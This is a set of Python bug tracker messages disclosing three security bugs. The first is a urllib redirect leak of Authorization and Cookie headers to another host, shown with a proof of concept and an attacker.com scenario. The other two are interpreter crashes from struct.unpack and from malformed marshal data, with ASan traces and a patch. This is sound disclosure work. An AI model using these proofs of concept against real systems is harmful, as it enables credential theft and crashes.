[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov added the comment:

If I am not missing something, section 6.4 of RFC 7231 doesn't explicitly say that all headers should be re-sent on a redirect. I wish it did :)

I think that an Authorization header for host A may make sense for host B if both A and B use the same database with user credentials. I am not sure that modern authentication mechanisms like OAuth rely on this fact (although I need to check the specs to make sure).

Sending a Cookie header to a different domain looks like a violation of the same-origin policy to me. RFC 6265 says something about it:

https://tools.ietf.org/html/rfc6265#section-5.4

curl was recently updated to filter out Authorization headers in case of a redirect to another host.

Chrome and Firefox don't send either Authorization or Cookie headers while handling a redirect. It doesn't seem to be a disaster for them :)

-- ___ Python tracker <https://bugs.python.org/issue33661> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
Artem Smotrakov <artem.smotra...@gmail.com> added the comment:

Hi Ivan,

Yes, unfortunately specs don't say anything about this scenario.

> once you have given your credentials to a server, it is free to do whatever
> it wants with them.

I hope servers don't share this opinion :)

> So, your proposed filtering does not actually achieve anything meaningful.

I am sorry that I couldn't convince you. Thank you for your reply!
[issue33661] urllib may leak sensitive HTTP headers to a third-party web site
New submission from Artem Smotrakov <artem.smotra...@gmail.com>:

After discussing it on secur...@python.org, it was decided to disclose it. Here is the original report:

Hello Python Security Team,

Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects. Let's consider the following environment:

- http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via basic HTTP authentication scheme
- http://httpleak.gypsyengineer.com/redirect.php?url= is an open redirect which returns 301 code, and redirects a client to the specified URL
- http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent

Let's then consider the following scenario:

- create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com'
- call urllib.request.Request.add_header() method to set Authorization and Cookie headers
- call urllib.request.urlopen() method to open a connection

Here is what happens next:

- urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected
- redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
- urllib processes 301 code and makes a request to http://headers.gypsyengineer.com

The problem is that urllib sends the Authorization and Cookie headers to http://headers.gypsyengineer.com as well.

Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php. If an attacker can trick the user into opening http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them.
As a result, the attacker can impersonate the user on the original web site.

Here is a simple POC which shows the problem:

    import urllib.request

    # The open redirect on httpleak sends the client on to headers.gypsyengineer.com.
    req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
    # These two headers are meant for httpleak.gypsyengineer.com only.
    req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
    req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com')
    with urllib.request.urlopen(req) as f:
        print(f.read(2048).decode("utf-8"))

Running this code results in loading http://headers.gypsyengineer.com, which prints out the Authorization and Cookie headers that are supposed to be sent only to httpleak.gypsyengineer.com:

    Hello, I am headers.gypsyengineer.com
    Here are HTTP headers you just sent me:
    Accept-Encoding: identity
    User-Agent: Python-urllib/3.8
    Authorization: Basic YWRtaW46dGVzdA==
    Cookie: This is only for httpleak.gypsyengineer.com
    Host: headers.gypsyengineer.com
    Cache-Control: max-age=259200
    Connection: keep-alive

I could reproduce it with 3.5.2, and latest build of https://github.com/python/cpython

If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.

Please let me know if I wrote anything dumb and stupid, or if you have any questions :)

Thanks!

Artem

--
components: Library (Lib)
messages: 317793
nosy: alex, artem.smotrakov
priority: normal
severity: normal
status: open
title: urllib may leak sensitive HTTP headers to a third-party web site
type: security
versions: Python 3.5
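The filtering suggested in the report can be sketched on top of the existing urllib.request.HTTPRedirectHandler API. This is only an illustration under stated assumptions, not a fix that was applied to urllib: the class name StripSensitiveHeadersOnRedirect, the SENSITIVE_HEADERS tuple, and the decision to compare host names only (ignoring scheme and port) are all choices made here for the example.

```python
import urllib.request
from urllib.parse import urlsplit

# Assumption: these are the headers treated as sensitive in this sketch.
# Request stores header names via str.capitalize(), so these spellings match.
SENSITIVE_HEADERS = ("Authorization", "Cookie")


class StripSensitiveHeadersOnRedirect(urllib.request.HTTPRedirectHandler):
    """Hypothetical handler: drop sensitive headers on cross-host redirects."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # Let the stock handler decide whether to follow the redirect
        # and build the follow-up request.
        new_req = super().redirect_request(req, fp, code, msg, headers, newurl)
        if new_req is None:
            return None

        old_host = urlsplit(req.full_url).hostname
        new_host = urlsplit(new_req.full_url).hostname
        if old_host != new_host:
            # The redirect leaves the original host: do not forward
            # credentials or cookies that were set for it.
            for name in SENSITIVE_HEADERS:
                new_req.remove_header(name)
        return new_req


def build_filtering_opener():
    # build_opener() replaces the default HTTPRedirectHandler with the
    # subclass passed in.
    return urllib.request.build_opener(StripSensitiveHeadersOnRedirect)
```

With such an opener, the POC would call build_filtering_opener().open(req) instead of urllib.request.urlopen(req). Whether host-name comparison is the right boundary is a design question the sketch does not settle.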
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
Changes by Artem Smotrakov <artem.smotra...@gmail.com>:

--
keywords: +patch
Added file: http://bugs.python.org/file46723/_struct_cache.patch
[issue29802] A possible null-pointer dereference in struct.s_unpack_internal()
New submission from Artem Smotrakov:

Attached struct_unpack_crash.py results in a null-pointer dereference in s_unpack_internal() function of _struct module:

    ASAN:SIGSEGV
    ==20245==ERROR: AddressSanitizer: SEGV on unknown address 0x (pc 0x7facd2cea83a bp 0x sp 0x7ffd0250f860 T0)
    #0 0x7facd2cea839 in s_unpack_internal /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515
    #1 0x7facd2ceab69 in Struct_unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1570
    #2 0x7facd2ceab69 in unpack_impl /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:2192
    #3 0x7facd2ceab69 in unpack /home/artem/projects/python/src/cpython-asan/Modules/clinic/_struct.c.h:215
    #4 0x474397 in _PyMethodDef_RawFastCallKeywords Objects/call.c:618
    #5 0x474397 in _PyCFunction_FastCallKeywords Objects/call.c:690
    #6 0x42685f in call_function Python/ceval.c:4817
    #7 0x42685f in _PyEval_EvalFrameDefault Python/ceval.c:3298
    #8 0x54b164 in PyEval_EvalFrameEx Python/ceval.c:663
    #9 0x54b164 in _PyEval_EvalCodeWithName Python/ceval.c:4173
    #10 0x54b252 in PyEval_EvalCodeEx Python/ceval.c:4200
    #11 0x54b252 in PyEval_EvalCode Python/ceval.c:640
    #12 0x431e0e in run_mod Python/pythonrun.c:976
    #13 0x431e0e in PyRun_FileExFlags Python/pythonrun.c:929
    #14 0x43203b in PyRun_SimpleFileExFlags Python/pythonrun.c:392
    #15 0x446354 in run_file Modules/main.c:338
    #16 0x446354 in Py_Main Modules/main.c:809
    #17 0x41df71 in main Programs/python.c:69
    #18 0x7facd58ac82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #19 0x428728 in _start (/home/artem/projects/python/build/cpython-asan/bin/python3.7+0x428728)

    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/artem/projects/python/src/cpython-asan/Modules/_struct.c:1515 s_unpack_internal
    ==20245==ABORTING

Looks like the _struct implementation assumes that PyStructObject->s_codes cannot be null, but it may happen if a bytearray was passed to unpack().
PyStructObject->s_codes is set to null in a couple of places in _struct.c, but that is not what happens here.

unpack() calls _PyArg_ParseStack() with cache_struct_converter(), which maintains a cache. Even if unpack() was called incorrectly with a string as second parameter (see below), this value is going to be cached anyway. Next time, if the same format string is used, the value is going to be retrieved from the cache.

But PyStructObject->s_codes is still not null in cache_struct_converter() function. If you watch "s_object" under gdb, you can see that "s_codes" becomes null here:

    PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647
    647 view->format = NULL;
    (gdb) bt
    #0 PyBuffer_FillInfo (view=0x7fffd700, obj=obj@entry=0x77e50730, buf=0x8df478 <_PyByteArray_empty_string>, len=0, readonly=readonly@entry=0, flags=0) at Objects/abstract.c:647
    #1 0x0046020c in bytearray_getbuffer (obj=0x77e50730, view=, flags=) at Objects/bytearrayobject.c:72
    #2 0x00560b0a in getbuffer (errmsg=, view=0x7fffd700, arg=0x77e50730) at Python/getargs.c:1380
    #3 convertsimple (freelist=0x7fffd3b0, bufsize=256, msgbuf=0x7fffd4c0 "must be bytes-like object, not str", flags=2, p_va=0x0, p_format=, arg=0x77e50730) at Python/getargs.c:938
    #4 convertitem (arg=0x77e50730, p_format=p_format@entry=0x7fffd3a8, p_va=p_va@entry=0x7fffd610, flags=flags@entry=2, levels=levels@entry=0x7fffd3c0, msgbuf=msgbuf@entry=0x7fffd4c0 "must be bytes-like object, not str", bufsize=256, freelist=0x7fffd3b0) at Python/getargs.c:596
    #5 0x00561d6f in vgetargs1_impl (compat_args=compat_args@entry=0x0, stack=stack@entry=0x6164b520, nargs=2, format=format@entry=0x735d5c88 "O*:unpack", p_va=p_va@entry=0x7fffd610, flags=flags@entry=2) at Python/getargs.c:388
    #6 0x005639b0 in _PyArg_ParseStack_SizeT (args=args@entry=0x6164b520, nargs=, format=format@entry=0x735d5c88 "O*:unpack") at Python/getargs.c:163
    #7 0x735d2df8 in unpack (module=module@entry=0x77e523b8, args=args@entry=0x6164b520, nargs=, kwnames=kwnames@entry=0x0) at /home/artem/projects/python/src/cpython-asan/Modules/clinic/_struct.c.h:207
    #8 0x00474398 in _PyMethodDef_RawFastCallKeywords (kwnames=0x0, nargs=140737352377272, args=0x6164b520, self=0x77e523b8, method=0x737d94e0 <module_functions+160>) at Objects/call.c:618
    #9 _PyCFunction_FastCallKeywords (func=func@entry=0x77e53828, args=args@entry=0x6164b520, nargs=nargs@entry=2, kwnames=kwnames@en
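The attached struct_unpack_crash.py is not reproduced in this message, so the following is only a guess at the call sequence the description suggests: a first unpack() call that passes a str as the second argument (and fails), followed by a second call that reuses the same format string with a bytearray. The format string "b", the sample data, and the function name unpack_after_bad_call are assumptions made for illustration. On an interpreter where the problem is fixed, the first call should raise TypeError and the second should unpack normally; an affected build may crash instead.

```python
import struct

# Assumption: a simple one-byte format; the report does not say which
# format string the attached script used.
FMT = "b"


def unpack_after_bad_call(fmt=FMT):
    """Call unpack() incorrectly once, then correctly with the same format."""
    try:
        # Wrong type for the buffer argument: str instead of bytes-like.
        struct.unpack(fmt, "not bytes")
    except TypeError as exc:
        first_error = str(exc)
    else:
        first_error = None

    # Same format string again, this time with a bytearray of the right size.
    result = struct.unpack(fmt, bytearray(b"\x01"))
    return first_error, result


if __name__ == "__main__":
    print(unpack_after_bad_call())
```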
[issue27826] Null-pointer dereference in tuplehash() function
Changes by Artem Smotrakov <artem.smotra...@gmail.com>:

--
keywords: +patch
Added file: http://bugs.python.org/file44184/tuplehash.patch
[issue27826] Null-pointer dereference in tuplehash() function
New submission from Artem Smotrakov:

A null-pointer dereference may happen while deserializing malformed data with the marshal.loads() function. Here is a test which reproduces this (see also attached marshal_tuplehash_null_dereference.py):

    import marshal

    value = (  # tuple1
        "this is a string",  # string1
        [
            1,  # int1
            2,  # int2
            3,  # int3
            4   # int4
        ],
        (  # tuple2
            "more tuples",  # string2
            1.0,  # float1
            2.3,  # float2
            4.5   # float3
        ),
        "this is yet another string"
    )

    dump = marshal.dumps(value)
    data = bytearray(dump)
    # Corrupt selected bytes of the serialized stream.
    data[10] = 40
    data[4] = 16
    data[103] = 143
    data[97] = 245
    data[78] = 114
    data[35] = 188
    marshal.loads(bytes(data))

This code modifies the serialized data as follows:

- update type of 'int2' element to TYPE_SET, 'int3' element becomes a length of the set
- update 'float3' element to TYPE_REF which points to tuple1

Here is a stack trace reported by ASan:

    ASAN:SIGSEGV
    ==20296==ERROR: AddressSanitizer: SEGV on unknown address 0x0008 (pc 0x00582064 bp 0x7ffc9e581310 sp 0x7ffc9e5812f0 T0)
    #0 0x582063 in PyObject_Hash Objects/object.c:769
    #1 0x5a3662 in tuplehash Objects/tupleobject.c:358
    #2 0x5820ae in PyObject_Hash Objects/object.c:771
    #3 0x5a3662 in tuplehash Objects/tupleobject.c:358
    #4 0x5820ae in PyObject_Hash Objects/object.c:771
    #5 0x58fac8 in set_add_key Objects/setobject.c:422
    #6 0x59a85c in PySet_Add Objects/setobject.c:2323
    #7 0x760d9d in r_object Python/marshal.c:1310
    #8 0x76029d in r_object Python/marshal.c:1223
    #9 0x760015 in r_object Python/marshal.c:1195
    #10 0x7621dc in read_object Python/marshal.c:1465
    #11 0x7639be in marshal_loads Python/marshal.c:1767
    #12 0x577ff3 in PyCFunction_Call Objects/methodobject.c:109
    #13 0x708a05 in call_function Python/ceval.c:4744
    #14 0x6fb5a7 in PyEval_EvalFrameEx Python/ceval.c:3256
    #15 0x70276f in _PyEval_EvalCodeWithName Python/ceval.c:4050
    #16 0x70299f in PyEval_EvalCodeEx Python/ceval.c:4071
    #17 0x6e07d7 in PyEval_EvalCode Python/ceval.c:778
    #18 0x432354 in run_mod Python/pythonrun.c:980
    #19 0x431e5b in PyRun_FileExFlags Python/pythonrun.c:933
    #20 0x42e929 in PyRun_SimpleFileExFlags Python/pythonrun.c:396
    #21 0x42caba in PyRun_AnyFileExFlags Python/pythonrun.c:80
    #22 0x45f995 in run_file Modules/main.c:319
    #23 0x4619c8 in Py_Main Modules/main.c:777
    #24 0x41d258 in main Programs/python.c:69
    #25 0x7f374629babf in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x20abf)
    #26 0x41ce28 in _start

    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV Objects/object.c:769 PyObject_Hash
    ==20296==ABORTING

What happens when it tries to read int2 element:

- int2 element is now a set of length 3
- add int4 element to the set
- add tuple2 element
-- when it adds an element to a set, it calculates a hash of the element
-- when it calculates a hash of a tuple, it calculates hashes of all elements of the tuple
-- while calculating a hash of tuple2, it calculates a hash of tuple1 since float3 now is a TYPE_REF which points to tuple1
-- but tuple1 is not complete yet: length of tuple1 is 4, but only string1 was added to it
-- tuplehash() function reads a length of a tuple, and then calls PyObject_Hash() for each element
-- but it doesn't check if all elements were added to the tuple
-- as a result, a null-pointer dereference happens in tuplehash() while reading second element of tuple1

https://hg.python.org/cpython/file/tip/Objects/tupleobject.c#l347

    ...
    static Py_hash_t
    tuplehash(PyTupleObject *v)
    {
        Py_uhash_t x;  /* Unsigned for defined overflow behavior. */
        Py_hash_t y;
        Py_ssize_t len = Py_SIZE(v);  <= for tuple1 it returns 4, but tuple1 contains only one element (string1)
        PyObject **p;
        Py_uhash_t mult = _PyHASH_MULTIPLIER;
        x = 0x345678UL;
        p = v->ob_item;
        while (--len >= 0) {
            y = PyObject_Hash(*p++);  <= null-pointer dereference happens here while reading second element
    ...

I could reproduce it with python3.5, and latest build of https://hg.python.org/cpython (Aug 20th, 2016).
Here is a simple patch which updates tuplehash() to check "p" for null:

diff -r 6e6aa2054824 Objects/tupleobject.c
--- a/Objects/tupleobject.c Sat Aug 20 21:22:03 2016 +0300
+++ b/Objects/tupleobject.c Sat Aug 20 23:17:16 2016 -0700
@@ -355,7 +355,13 @@
     x = 0x345678UL;
     p = v->ob_item;
     while (--len >= 0) {
-        y = PyObject_Hash(*p++);
+        PyObject *next = *p++;
+        if (next == NULL) {
+            PyErr_SetString(PyExc_TypeError,
+                "Cannot compute a hash, tuple seems to be invalid");
+            return -1;
+        }
+        y = PyObject_Hash(next);
         if (y == -1)
             return -1;
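The effect of the patch can be modelled in pure Python. This is only a toy model, not CPython code: the _NULL sentinel stands in for an unfilled (NULL) slot of a tuple that is still being unmarshalled, and checked_tuple_hash and partial_tuple1 are hypothetical names. Unlike the patch, which checks each slot inside the hashing loop, the model checks all slots up front; the observable result is the same for this case, a TypeError instead of a dereference of the empty slot.

```python
# Hypothetical stand-in for a NULL entry in a tuple's ob_item array.
_NULL = object()


def checked_tuple_hash(slots):
    """Hash a tuple-like sequence, refusing sequences with unfilled slots."""
    for item in slots:
        if item is _NULL:
            # Mirrors the error raised by the proposed patch.
            raise TypeError("Cannot compute a hash, tuple seems to be invalid")
    return hash(tuple(slots))


# tuple1 from the report at the moment it is hashed: its length is 4,
# but only string1 has been stored so far.
partial_tuple1 = ["this is a string", _NULL, _NULL, _NULL]
```

Calling checked_tuple_hash(partial_tuple1) raises TypeError, while a fully populated sequence hashes exactly like the corresponding tuple.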